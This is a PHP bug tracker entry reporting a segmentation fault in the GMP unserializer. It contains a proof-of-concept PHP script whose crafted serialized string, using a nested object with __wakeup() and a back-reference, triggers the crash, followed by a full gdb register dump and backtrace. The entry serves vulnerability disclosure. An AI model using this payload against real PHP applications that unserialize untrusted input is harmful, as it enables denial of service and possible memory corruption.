[2016-09-23 16:59 UTC] ahihibughunter at gmail dot com
-Summary: Create an Unexpected Object when Deserialize GMP
object
+Summary: Crash with an Unexpected Object when Deserialize GMP
object
[2016-09-23 16:59 UTC] ahihibughunter at gmail dot com
[2017-01-16 13:32 UTC] nikic@php.net
-Status: Open
+Status: Duplicate
[2017-01-16 13:32 UTC] nikic@php.net
Description:
------------
Similar to bug #72663. When PHP unserializes a GMP object whose custom (C:) serialization payload contains a nested object with a __wakeup() handler, unserialize() crashes with SIGSEGV (ASan/gdb output below: zend_std_get_properties called from gmp_unserialize). In the test script the nested object's property is a back-reference (R:2) into the payload, which __wakeup() overwrites with a 255-byte string while gmp_unserialize is still processing that payload, so the GMP unserializer presumably continues on data of an unexpected type. Note that this is only reachable where unserialize() is fed attacker-controlled input, which is unsafe independently of this bug.
Test script:
---------------
<?php
class bug{
    public function __wakeup(){
        $this->bug=str_repeat('A', 0xff);
    }
}
$r='s:1:"0";a:1:{i:0;O:3:"bug":1:{s:3:"bug";R:2;}}';
$s='a:1:{i:0;C:3:"GMP":'.strlen($r).':{'.$r.'}}';
$x=unserialize($s);
Expected result:
----------------
No crash
Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x803df5e8aa20
RBX: 0x10007fff730e --> 0xf4f4f400f1f1f1f1
RCX: 0x7ffff7f67820 --> 0x0
RDX: 0x1007bebd1545
RSI: 0xffffeff006b --> 0x0
RDI: 0x803df5e8aa28
RBP: 0x7fffffff9830 --> 0x7fffffff9980 --> 0x7fffffff9bc0 --> 0x7fffffff9d10 --> 0x7fffffff9f50 --> 0x7fffffffa0e0 (--> ...)
RSP: 0x7fffffff9810 --> 0x7ffff7f7dd75 --> 0x29007d7d ('}}')
RIP: 0xbd6bea (<zend_std_get_properties+121>: cmp BYTE PTR [rdx+0x7fff8000],0x0)
R8 : 0x1
R9 : 0xa ('\n')
R10: 0x778
R11: 0x1e
R12: 0x7ffff7f7b2f0 --> 0x700000008 --> 0x0
R13: 0x7ffff7f7d890 --> 0x7ffff7f7c378 --> 0x41 ('A')
R14: 0xffffffff30e --> 0x0
R15: 0x7ffff7f7d8b0 --> 0x1
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xbd6bdf <zend_std_get_properties+110>: lea rdi,[rax+0x8]
0xbd6be3 <zend_std_get_properties+114>: mov rdx,rdi
0xbd6be6 <zend_std_get_properties+117>: shr rdx,0x3
=> 0xbd6bea <zend_std_get_properties+121>: cmp BYTE PTR [rdx+0x7fff8000],0x0
0xbd6bf1 <zend_std_get_properties+128>: je 0xbd6bf8 <zend_std_get_properties+135>
0xbd6bf3 <zend_std_get_properties+130>: call 0x4205e0 <__asan_report_load8@plt>
0xbd6bf8 <zend_std_get_properties+135>: mov rbx,QWORD PTR [rax+0x8]
0xbd6bfc <zend_std_get_properties+139>: lea r13,[rbx+0x8]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffff9810 --> 
0x7ffff7f7dd75 --> 0x29007d7d ('}}') 0008| 0x7fffffff9818 --> 0x10007fff730e --> 0xf4f4f400f1f1f1f1 0016| 0x7fffffff9820 --> 0x7ffff7f7b2f0 --> 0x700000008 --> 0x0 0024| 0x7fffffff9828 --> 0x7ffff7f7d890 --> 0x7ffff7f7c378 --> 0x41 ('A') 0032| 0x7fffffff9830 --> 0x7fffffff9980 --> 0x7fffffff9bc0 --> 0x7fffffff9d10 --> 0x7fffffff9f50 --> 0x7fffffffa0e0 (--> ...) 0040| 0x7fffffff9838 --> 0x74e4b7 (<gmp_unserialize+1387>: mov r8d,0x8) 0048| 0x7fffffff9840 --> 0x178d330 --> 0x0 0056| 0x7fffffff9848 --> 0xffffffff38c --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x0000000000bd6bea in zend_std_get_properties (object=<optimized out>) at /home/z/php5/Zend/zend_object_handlers.c:108 108 zobj = Z_OBJ_P(object); gdb-peda$ bt #0 0x0000000000bd6bea in zend_std_get_properties (object=<optimized out>) at /home/z/php5/Zend/zend_object_handlers.c:108 #1 0x000000000074e4b7 in gmp_unserialize (object=<optimized out>, ce=<optimized out>, buf=<optimized out>, buf_len=<optimized out>, data=<optimized out>) at /home/z/php5/ext/gmp/gmp.c:662 #2 0x0000000000a01e9f in object_custom (ce=0x603600005e00, var_hash=0x2e, max=0x2e <error: Cannot access memory at address 0x2e>, p=0x7fffffffa030, rval=0x2e) at /home/z/php5/ext/standard/var_unserializer.c:393 #3 php_var_unserialize (rval=rval@entry=0x7fffffff9c60, p=p@entry=0x7fffffffa030, max=max@entry=0x7ffff7f7dd77 "", var_hash=var_hash@entry=0x7fffffffa070) at /home/z/php5/ext/standard/var_unserializer.c:758 #4 0x0000000000a045d2 in process_nested_data (rval=rval@entry=0x7fffffff9f88, p=p@entry=0x7fffffffa030, max=max@entry=0x7ffff7f7dd77 "", var_hash=var_hash@entry=0x7fffffffa070, ht=<optimized out>, elements=0x0, elements@entry=0x1, objprops=<optimized out>, objprops@entry=0x0) at /home/z/php5/ext/standard/var_unserializer.c:324 #5 0x0000000000a02589 in php_var_unserialize (rval=rval@entry=0x7fffffff9f88, p=p@entry=0x7fffffffa030, 
max=<optimized out>, var_hash=var_hash@entry=0x7fffffffa070) at /home/z/php5/ext/standard/var_unserializer.c:842 #6 0x00000000009da822 in zif_unserialize (ht=<optimized out>, return_value=<optimized out>, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/z/php5/ext/standard/var.c:964 #7 0x0000000000d616fc in zend_do_fcall_common_helper_SPEC (execute_data=execute_data@entry=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:558 #8 0x0000000000d630be in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:2602 #9 0x0000000000c148ad in execute_ex (execute_data=execute_data@entry=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:363 #10 0x0000000000d5caaf in zend_execute (op_array=0x7ffff7f7adc0) at /home/z/php5/Zend/zend_vm_execute.h:388 #11 0x0000000000b67b3e in zend_execute_scripts (type=type@entry=0x8, retval=retval@entry=0x0, file_count=file_count@entry=0x3) at /home/z/php5/Zend/zend.c:1341 #12 0x0000000000a48876 in php_execute_script (primary_file=primary_file@entry=0x7fffffffcf20) at /home/z/php5/main/main.c:2613 #13 0x0000000000d6604e in do_cli (argc=argc@entry=0x2, argv=argv@entry=0x60060000ee90) at /home/z/php5/sapi/cli/php_cli.c:994 #14 0x0000000000d680d6 in main (argc=argc@entry=0x2, argv=0x60060000ee90, argv@entry=0x7fffffffe668) at /home/z/php5/sapi/cli/php_cli.c:1378 #15 0x00007ffff3da7f45 in __libc_start_main (main=0xd670a2 <main>, argc=0x2, argv=0x7fffffffe668, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe658) at libc-start.c:287 #16 0x00000000004226e9 in _start ()